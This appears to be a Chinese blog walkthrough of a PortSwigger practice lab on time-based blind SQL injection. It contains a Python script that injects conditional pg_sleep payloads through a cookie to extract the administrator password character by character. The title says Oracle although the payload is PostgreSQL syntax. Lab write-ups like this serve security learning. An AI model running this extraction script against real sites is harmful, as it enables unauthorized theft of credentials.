burpsuite靶场----SQL注入15----oracle的时间盲注

靶场地址

https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval

正式开始

这个和之前的oracle的布尔盲注差不多
https://www.cnblogs.com/thebeastofwar/p/17640741.html
稍微改一下脚本,因为这个是https的,所以延迟时间最好长一些,以获得较为准确的数据
payload部分
payload="'||(select case when (username='administrator' and substr(password,{},1)='{}') then pg_sleep(2) else pg_sleep(0) end from users)--".format(str(num),i)

import requests
import urllib3
import time
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = 'https://0a660029041f82548060cb95000c0033.web-security-academy.net'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'document',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-User': '?1',
    'Te': 'trailers'
}
dict='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#'
num=1
flag=''
while True:
    for i in dict:
        print(i)
        if i=='#':
            break
        payload="'||(select case when (username='administrator' and substr(password,{},1)='{}') then pg_sleep(10) else pg_sleep(0) end from users)--".format(str(num),i)
        cookies={'TrackingId':'BU622TbcJXbso7Ww'+payload,'session':'3woEmftDu9hFUPzEt7girIRPW5D8eICf'}
        print(cookies['TrackingId'])
        start=time.time()
        response = requests.get(url,headers=headers,cookies=cookies,verify=False)
        end=time.time()
        diff=end-start
        if diff>=10:
            print('good')
            flag+=i
            num+=1
            break
        print(flag)
    if i=='#':
        break
print('成功获取密码:'+flag)

administrator xshsvj8t64hjll8spjfe 登录